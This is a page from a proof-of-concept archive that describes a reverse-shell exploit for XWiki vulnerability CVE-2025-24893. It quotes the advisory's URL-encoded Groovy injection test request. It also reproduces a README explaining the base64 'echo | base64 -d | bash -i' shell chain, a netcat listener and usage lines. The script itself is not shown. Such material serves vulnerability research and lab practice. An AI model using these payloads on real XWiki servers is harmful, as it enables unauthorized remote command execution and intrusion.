Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/Bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
CVE-2025-24893 RCE exploit for XWiki with reverse shell capability
Readme
# CVE-2025-24893 Reverse Shell Exploit for XWiki

**Disclaimer:** This script is intended for **educational purposes and authorized security testing only**. Do **not** use on systems you do not own or have explicit permission to test. Misuse can be illegal and dangerous.

## Description
This Python script exploits **CVE-2025-24893**, a Remote Code Execution vulnerability affecting XWiki versions up to **15.10.10**.

- **Tested Version:** XWiki 15.10.8
- **Impact:** Allows execution of arbitrary commands on the target server.
- **Python Version:** Written and tested in **Python 3**

This version **extends the original PoC** by Al Baradi Joy to spawn a **reverse shell**. The original PoC can be found [here](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py).

## How It Works
- XWiki executes Groovy code via the URL parameter.
- The exploit injects a **`bash -c` command** into this Groovy template.
- A normal reverse shell contains multiple quotes (`'` and `"`) that would **break Groovy evaluation** and the URL.
- To solve this, the script **encodes the one-line shell command in Base64**.
- The payload is then sent in the URL and executed using the following chain:

    `{echo,<base64>} | {base64,-d} | {bash,-i}`

- This decodes the Base64 payload safely and executes it with `bash -i`, giving an interactive reverse shell.

## Target URL Format
- **Format:** `http://<target-host>`
- **Do NOT include:**
  - A trailing slash `/` at the end
  - The `/xwiki` path (the script appends it automatically)

**Examples:**

    # Correct
    http://10.129.95.114:8080
    http://example.com:8080

    # Incorrect
    http://10.129.95.114:8080/         # trailing slash
    http://example.com/xwiki            # includes /xwiki

## Listener Setup
Before running the exploit, you **must start a listener** on your machine to catch the reverse shell.

**Example using Netcat:**

    nc -lvnp <lport>

- `<lport>` should match the port you provide as an argument to the script.

## Usage

    python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

**Example:**

    python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444

- The script prints the full exploit URL, Base64 payload, and instructions for checking your listener.

## References
- [GHSA Advisory](https://github.com/advisories/GHSA-rr6p-3pfg-562j)
- [XWiki Homepage](https://www.xwiki.org/)
- Original PoC by [Al Baradi Joy](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py)

## Credits
- Original Proof-of-Concept: Al Baradi Joy
- This version: Upgraded to spawn a reverse shell for interactive command execution

## Warning
- Use this exploit **only in controlled environments** (HTB, lab machines, VMs you own).
- Unauthorized use on public servers is illegal and can result in criminal charges.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →